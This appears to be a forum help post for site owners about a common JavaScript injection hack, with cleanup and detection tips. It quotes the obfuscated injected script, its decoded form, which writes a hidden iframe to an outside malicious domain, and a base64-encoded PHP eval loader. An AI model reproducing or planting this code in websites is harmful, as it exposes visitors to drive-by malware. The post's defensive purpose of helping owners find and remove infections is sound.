Malicious software hosted donationwarecallers.info, hubsilver.info, samplesstimulate.info

and/or 

pphoenix.org, fepawctes.myfw.us, zqruajfsgir.myfw.us, firingwaterway.org

This is a VERY common hack I am seeing currently.  The hack is a javascript hack, a block of obfuscated script is inserted into the pages of the site.  The block of script looks something like this

 /*c0d5075664ac5fed12fe77bd59d6fd3b*/try{document["b"+"ody"]*? document}catch(dgsgsdg){zxc? 1;ww? window;}try{d? document["createElement"]("span");}catch(agdsg){zxc? 0;}try{if(ww.document)window["doc"+"ument"]["body"]? "zxc"}catch(bawetawe){if(ww.document){v? window;n? ["3o", "4d", "46", "3l", "4c", "41", "47", "46", "16", "3p", "4a", "3j", "1e", "3j", "1i", "3k", "1f", "4j", "4a", "3n", "4c", "4d", "4a", "46", "16", "2p", "3j", "4c", "40", "1k", "3o", "44", "47", "47", "4a", "1e", "2p", "3j", "4c", "40", "1k", "4a", "3j", "46", "3m", "47", "45", "1e", "1f", "1g", "1e", "3k", "1j", "3j", "1h", "1n", "1f", "1f", "1h", "3j", "27", "4l", "d", "a", "3o", "4d", "46", "3l", "4c", "41", "47", "46", "16", "4a", "4b", "1e", "1f", "4j", "4a", "3n", "4c", "4d", "4a", "46", "16", "2p", "3j", "4c", "40", "1k", "4a", "3j", "46", "3m", "47", "45", "1e", "1f", "1k", "4c", "47", "35", "4c", "4a", "41", "46", "3p", "1e", "1p", "22", "1f", "1k", "4b", "4d", "3k", "4b", "4c", "4a", "41", "46", "3p", "1e", "21", "1f", "27", "4l", "d", "a", "41", "3o", "1e", "46", "3j", "4e", "41", "3p", "3j", "4c", "47", "4a", "1k", "3l", "47", "47", "43", "41", "3n", "2h", "46", "3j", "3k", "44", "3n", "3m", "16", "1c", "1c", "16", "3m", "47", "3l", "4d", "45", "3n", "46", "4c", "1k", "3l", "47", "47", "43", "41", "3n", "1k", "41", "46", "3m", "3n", "4g", "31", "3o", "1e", "1d", "4c", "3n", "4b", "4c", "3l", "47", "47", "43", "41", "3n", "1n", "29", "1d", "1f", "29", "29", "1j", "1n", "1f", "4j", "d", "a", "9", "4e", "3j", "4a", "16", "4b", "4c", "46", "45", "29", "4a", "4b", "1e", "1f", "27", "d", "a", "9", "3m", "47", "3l", "4d", "45", "3n", "46", "4c", "1k", "4f", "4a", "41", "4c", "3n", "1e", "1d", "28", "4b", "4c", "4h", "44", "3n", "2a", "1k", "4b", "1d", "1h", "4b", "4c", "46", "45", "1h", "1d", "16", "4j", "16", "48", "47", "4b", "41", "4c", "41", "47", "46", "26", "3j", "3k", "4b", "47", "44", "4d", "4c", "3n", "27", "16", "44", "3n", "3o", "4c", "26", "1j", "1d", "1h", "3p", "4a", "3j", "1e", "22", "1m", "1m", "1i", "1n", "1m", "1m", "1m", "1f", "1h", "1d", "48", "4g", "27", "16", "4c", "47", "48", "26", "1j", "1d", "1h", "3p", "4a", "3j", "1e", "22", "1m", "1m", "1i", "1n", "1m", "1m", "1m", "1f", "1h", "1d", "48", "4g", "27", "16", "4l", "28", "1l", "4b", "4c", "4h", "44", "3n", "2a", "16", "28", "3m", "41", "4e", "16", "3l", "44", "3j", "4b", "4b", "29", "18", "4b", "1d", "1h", "4b", "4c", "46", "45", "1h", "1d", "18", "2a", "28", "41", "3o", "4a", "3j", "45", "3n", "16", "4b", "4a", "3l", "29", "18", "40", "4c", "4c", "48", "26", "1l", "1l", "3o", "41", "4a", "41", "46", "3p", "4f", "3j", "4c", "3n", "4a", "4f", "3j", "4h", "1k", "47", "4a", "3p", "1l", "3j", "3m", "1l", "3o", "3n", "3n", "3m", "1k", "48", "40", "48", "18", "16", "4f", "41", "3m", "4c", "40", "29", "18", "1d", "1h", "3p", "4a", "3j", "1e", "1p", "1m", "1m", "1i", "22", "1m", "1m", "1f", "1h", "1d", "18", "16", "40", "3n", "41", "3p", "40", "4c", "29", "18", "1d", "1h", "3p", "4a", "3j", "1e", "1p", "1m", "1m", "1i", "22", "1m", "1m", "1f", "1h", "1d", "18", "2a", "28", "1l", "41", "3o", "4a", "3j", "45", "3n", "2a", "28", "1l", "3m", "41", "4e", "2a", "1d", "1f", "27", "d", "a", "9", "4e", "3j", "4a", "16", "3n", "4g", "48", "29", "46", "3n", "4f", "16", "2g", "3j", "4c", "3n", "1e", "1f", "27", "3n", "4g", "48", "1k", "4b", "3n", "4c", "2g", "3j", "4c", "3n", "1e", "3n", "4g", "48", "1k", "3p", "3n", "4c", "2g", "3j", "4c", "3n", "1e", "1f", "1h", "23", "1f", "27", "d", "a", "9", "3m", "47", "3l", "4d", "45", "3n", "46", "4c", "1k", "3l", "47", "47", "43", "41", "3n", "29", "1d", "4c", "3n", "4b", "4c", "3l", "47", "47", "43", "41", "3n", "1n", "29", "1d", "1h", "4a", "4b", "1e", "1f", "1h", "1d", "27", "16", "3n", "4g", "48", "41", "4a", "3n", "4b", "29", "1d", "1h", "3n", "4g", "48", "1k", "4c", "47", "2j", "2p", "36", "35", "4c", "4a", "41", "46", "3p", "1e", "1f", "27", "d", "a", "4l"];h? 2;s? "";if(zxc){for(i? 0;i-609!? 0;i++){k? i;s+? String.fromCharCode(parseInt(n[i], 26));}z? s;vl? "val";if(ww.document)ww["e"+vl](z)}}}/*c0d5075664ac5fed12fe77bd59d6fd3b*/

which will de-obfuscate to something like

fun​ction gra(a,b){return Math.floor(Math.random()*(b-a+1))+a;}
function rs(){return Math.random().toString(36).substring(5);}
if(navigator.cookieEnabled && doc​ument.cookie.indexOf('testcookie1=')==-1){
var stnm=rs();
doc​ument.write('<style>.s'+stnm+' { position:absolute; left:-'+gra(600,1000)+'px; top:-'+gra(600,1000)+'px; }</style> <div class="s'+stnm+'"><ifr​ame src="http://​donationwarecallers​.​info/ad/feed.php" width="'+gra(300,600)+'" height="'+gra(300,600)+'"></ifr​ame></div>');
var exp=new Date();exp.setDate(exp.getDate()+7);
document.cookie='testcookie1='+rs()+'; expires='+exp.toGMTString();
}

These comment tags /*c0d5075664ac5fed12fe77bd59d6fd3b*/ vary from site to site.

In the majority of the sites I have looked at the malicious script has been inserted at the end of multiple JavaScript files on the site.  In the last couple of days I have started to see some sites where the code has been inserted at the top of the homepage and most of the other php pages on the site.



On sites where the code is inserted at the top of the pages the code is being "First Click cloaked".  Site owners have found a file in the root directory, random filename, that contains a string of IP addresses.  The "hack" checks to see if the IP address in a request is in that file and if it is not it inserts the malicious code and then writes the IP address into the file.  If you use the File Viewer Tool to request your homepage or one of your other php pages you will see the code the first time you request the page BUT it is likely you will not see it if you request the page again.

If you see the code in your JavaScript files you will need to edit the files and remove the malicious block of script.  If you see the malicious script at the beginning of your homepage, your php files then the block of script is being written using some obfuscated php code, base64_decode stuff, either in the homepage such as index.php and/or in one or more of your common files.  Typically they will be in your active theme or one of your modules.  Check files like header.php and index2.php.  If you are not able to locate the infected files try the script at Simple script to find base64_decode in your files and see if it turns up anything.

I am seeing some indications that site owners are cleaning up their js files and within a few hours the code is being added back but have no confirmation of this. At any rate suggest you closely monitor the js files for awhile. If you do find the malicious code is being re-written work through the tips in the yellow block at the end of this post.

This is an example of the obfuscated php code.  The code will start with  eval or echo and then (base64_decode('  and a long string of seemingly random characters.  The characters will vary depending on the value of the comment tag and the malicious domain being used.

eval or echo(base64_decode ('dHJ5e2RvY3VtZW50WyJiIisib2R5Il0qPWRvY3VtZW50fWNhdG
NoKGRnc2dzZGcpe3p4Yz0xO3d3PXdpbmRvdzt9dHJ5e2Q9ZG9jdW1lbnRbImNyZWF
0ZUVsZW1lbnQiXSgic3BhbiIpO31jYXRjaChhZ2RzZyl7enhjPTA7fXRyeXtpZih3dy5kb2
N1bWVudCl3aW5kb3dbImRvYyIrInVtZW50Il1bImJvZHkiXT0ienhjIn1jYXRjaChiYXdldG
F3ZSl7aWYod3cuZG9jdW1lbnQpe3Y9d2luZG93O249WyIzbyIsIjRkIiwiNDYiLCIzbCIsIj
RjIiwiNDEiLCI0NyIsIjQ2IiwiMTYiLCIzcCIsIjRhIiwiM2oiLCIxZSIsIjNqIiwiMWkiLCIzayIsIj
FmIiwiNGoiLCI0YSIsIjNuIiwiNGMiLCI0ZCIsIjRhIiwiNDYiLCIxNiIsIjJwIiwiM2oiLCI0YyIs
IjQwIiwiMWsiLCIzbyIsIjQ0IiwiNDciLCI0NyIsIjRhIiwiMWUiLCIycCIsIjNqIiwiNGMiLCI0M
CIsIjFrIiwiNGEiLCIzaiIsIjQ2IiwiM20iLCI0NyIsIjQ1IiwiMWUiLCIxZiIsIjFnIiwiMWUiLCIza
yIsIjFqIiwiM2oiLCIxaCIsIjFuIiwiMWYiLCIxZiIsIjFoIiwiM2oiLCIyNyIsIjRsIiwiZCIsImEiLC
IzbyIsIjRkIiwiNDYiLCIzbCIsIjRjIiwiNDEiLCI0NyIsIjQ2IiwiMTYiLCI0YSIsIjRiIiwiMWUiLC
IxZiIsIjRqIiwiNGEiLCIzbiIsIjRjIiwiNGQiLCI0YSIsIjQ2IiwiMTYiLCIycCIsIjNqIiwiNGMiLCI
0MCIsIjFrIiwiNGEiLCIzaiIsIjQ2IiwiM20iLCI0NyIsIjQ1IiwiMWUiLCIxZiIsIjFrIiwiNGMiLCI0
NyIsIjM1IiwiNGMiLCI0YSIsIjQxIiwiNDYiLCIzcCIsIjFlIiwiMXAiLCIyMiIsIjFmIiwiMWsiLCI
0YiIsIjRkIiwiM2siLCI0YiIsIjRjIiwiNGEiLCI0MSIsIjQ2IiwiM3AiLCIxZSIsIjIxIiwiMWYiLCIy
NyIsIjRsIiwiZCIsImEiLCI0MSIsIjNvIiwiMWUiLCI0NiIsIjNqIiwiNGUiLCI0MSIsIjNwIiwiM2
oiLCI0YyIsIjQ3IiwiNGEiLCIxayIsIjNsIiwiNDciLCI0NyIsIjQzIiwiNDEiLCIzbiIsIjJoIiwiNDY
iLCIzaiIsIjNrIiwiNDQiLCIzbiIsIjNtIiwiMTYiLCIxYyIsIjFjIiwiMTYiLCIzbSIsIjQ3IiwiM2wiLC
I0ZCIsIjQ1IiwiM24iLCI0NiIsIjRjIiwiMWsiLCIzbCIsIjQ3IiwiNDciLCI0MyIsIjQxIiwiM24iLC
IxayIsIjQxIiwiNDYiLCIzbSIsIjNuIiwiNGciLCIzMSIsIjNvIiwiMWUiLCIxZCIsIjRjIiwiM24iLC
I0YiIsIjRjIiwiM2wiLCI0NyIsIjQ3IiwiNDMiLCI0MSIsIjNuIiwiMW4iLCIyOSIsIjFkIiwiMWYiL
CIyOSIsIjI5IiwiMWoiLCIxbiIsIjFmIiwiNGoiLCJkIiwiYSIsIjkiLCI0ZSIsIjNqIiwiNGEiLCIxN
iIsIjRiIiwiNGMiLCI0NiIsIjQ1IiwiMjkiLCI0YSIsIjRiIiwiMWUiLCIxZiIsIjI3IiwiZCIsImEiLCI5
IiwiM20iLCI0NyIsIjNsIiwiNGQiLCI0NSIsIjNuIiwiNDYiLCI0YyIsIjFrIiwiNGYiLCI0YSIsIjQ
xIiwiNGMiLCIzbiIsIjFlIiwiMWQiLCIyOCIsIjRiIiwiNGMiLCI0aCIsIjQ0IiwiM24iLCIyYSIsIj
FrIiwiNGIiLCIxZCIsIjFoIiwiNGIiLCI0YyIsIjQ2IiwiNDUiLCIxaCIsIjFkIiwiMTYiLCI0aiIsIjE2
IiwiNDgiLCI0NyIsIjRiIiwiNDEiLCI0YyIsIjQxIiwiNDciLCI0NiIsIjI2IiwiM2oiLCIzayIsIjRiIiwi
NDciLCI0NCIsIjRkIiwiNGMiLCIzbiIsIjI3IiwiMTYiLCI0NCIsIjNuIiwiM28iLCI0YyIsIjI2Iiwi
MWoiLCIxZCIsIjFoIiwiM3AiLCI0YSIsIjNqIiwiMWUiLCIyMiIsIjFtIiwiMW0iLCIxaSIsIjFuI
iwiMW0iLCIxbSIsIjFtIiwiMWYiLCIxaCIsIjFkIiwiNDgiLCI0ZyIsIjI3IiwiMTYiLCI0YyIsIjQ3
IiwiNDgiLCIyNiIsIjFqIiwiMWQiLCIxaCIsIjNwIiwiNGEiLCIzaiIsIjFlIiwiMjIiLCIxbSIsIjFtIi
wiMWkiLCIxbiIsIjFtIiwiMW0iLCIxbSIsIjFmIiwiMWgiLCIxZCIsIjQ4IiwiNGciLCIyNyIsIjE
2IiwiNGwiLCIyOCIsIjFsIiwiNGIiLCI0YyIsIjRoIiwiNDQiLCIzbiIsIjJhIiwiMTYiLCIyOCIsIj
NtIiwiNDEiLCI0ZSIsIjE2IiwiM2wiLCI0NCIsIjNqIiwiNGIiLCI0YiIsIjI5IiwiMTgiLCI0YiIsIjF
kIiwiMWgiLCI0YiIsIjRjIiwiNDYiLCI0NSIsIjFoIiwiMWQiLCIxOCIsIjJhIiwiMjgiLCI0MSIs
IjNvIiwiNGEiLCIzaiIsIjQ1IiwiM24iLCIxNiIsIjRiIiwiNGEiLCIzbCIsIjI5IiwiMTgiLCI0MCIsI
jRjIiwiNGMiLCI0OCIsIjI2IiwiMWwiLCIxbCIsIjNvIiwiNDEiLCI0YSIsIjQxIiwiNDYiLCIzcC
IsIjRmIiwiM2oiLCI0YyIsIjNuIiwiNGEiLCI0ZiIsIjNqIiwiNGgiLCIxayIsIjQ3IiwiNGEiLCIzcC
IsIjFsIiwiM2oiLCIzbSIsIjFsIiwiM28iLCIzbiIsIjNuIiwiM20iLCIxayIsIjQ4IiwiNDAiLCI0OCIs
IjE4IiwiMTYiLCI0ZiIsIjQxIiwiM20iLCI0YyIsIjQwIiwiMjkiLCIxOCIsIjFkIiwiMWgiLCIzcCIs
IjRhIiwiM2oiLCIxZSIsIjFwIiwiMW0iLCIxbSIsIjFpIiwiMjIiLCIxbSIsIjFtIiwiMWYiLCIxaCIs
IjFkIiwiMTgiLCIxNiIsIjQwIiwiM24iLCI0MSIsIjNwIiwiNDAiLCI0YyIsIjI5IiwiMTgiLCIxZCI
sIjFoIiwiM3AiLCI0YSIsIjNqIiwiMWUiLCIxcCIsIjFtIiwiMW0iLCIxaSIsIjIyIiwiMW0iLCIxb
SIsIjFmIiwiMWgiLCIxZCIsIjE4IiwiMmEiLCIyOCIsIjFsIiwiNDEiLCIzbyIsIjRhIiwiM2oiLC
I0NSIsIjNuIiwiMmEiLCIyOCIsIjFsIiwiM20iLCI0MSIsIjRlIiwiMmEiLCIxZCIsIjFmIiwiMjci
LCJkIiwiYSIsIjkiLCI0ZSIsIjNqIiwiNGEiLCIxNiIsIjNuIiwiNGciLCI0OCIsIjI5IiwiNDYiLCIz
biIsIjRmIiwiMTYiLCIyZyIsIjNqIiwiNGMiLCIzbiIsIjFlIiwiMWYiLCIyNyIsIjNuIiwiNGciLCI0
OCIsIjFrIiwiNGIiLCIzbiIsIjRjIiwiMmciLCIzaiIsIjRjIiwiM24iLCIxZSIsIjNuIiwiNGciLCI0OC
IsIjFrIiwiM3AiLCIzbiIsIjRjIiwiMmciLCIzaiIsIjRjIiwiM24iLCIxZSIsIjFmIiwiMWgiLCIyMyIs
IjFmIiwiMjciLCJkIiwiYSIsIjkiLCIzbSIsIjQ3IiwiM2wiLCI0ZCIsIjQ1IiwiM24iLCI0NiIsIjRjIi
wiMWsiLCIzbCIsIjQ3IiwiNDciLCI0MyIsIjQxIiwiM24iLCIyOSIsIjFkIiwiNGMiLCIzbiIsIjR
iIiwiNGMiLCIzbCIsIjQ3IiwiNDciLCI0MyIsIjQxIiwiM24iLCIxbiIsIjI5IiwiMWQiLCIxaCIsIj
RhIiwiNGIiLCIxZSIsIjFmIiwiMWgiLCIxZCIsIjI3IiwiMTYiLCIzbiIsIjRnIiwiNDgiLCI0MSI
sIjRhIiwiM24iLCI0YiIsIjI5IiwiMWQiLCIxaCIsIjNuIiwiNGciLCI0OCIsIjFrIiwiNGMiLCI0N
yIsIjJqIiwiMnAiLCIzNiIsIjM1IiwiNGMiLCI0YSIsIjQxIiwiNDYiLCIzcCIsIjFlIiwiMWYiLCIy
NyIsImQiLCJhIiwiNGwiXTtoPTI7cz0iIjtpZih6eGMpe2ZvcihpPTA7aS02MDkhPTA7aS
srKXtrPWk7cys9U3RyaW5nLmZyb21DaGFyQ29kZShwYXJzZUludChuW2ldLDI2KS
k7fXo9czt2bD0idmFsIjtpZih3dy5kb2N1bWVudCl3d1siZSIrdmxdKHopfX19');

If you are unsure about any base64 stuff you find try plugging it into the Base64 Decoder.  In most cases once it has been decoded you will be able to get a good idea what the code is doing.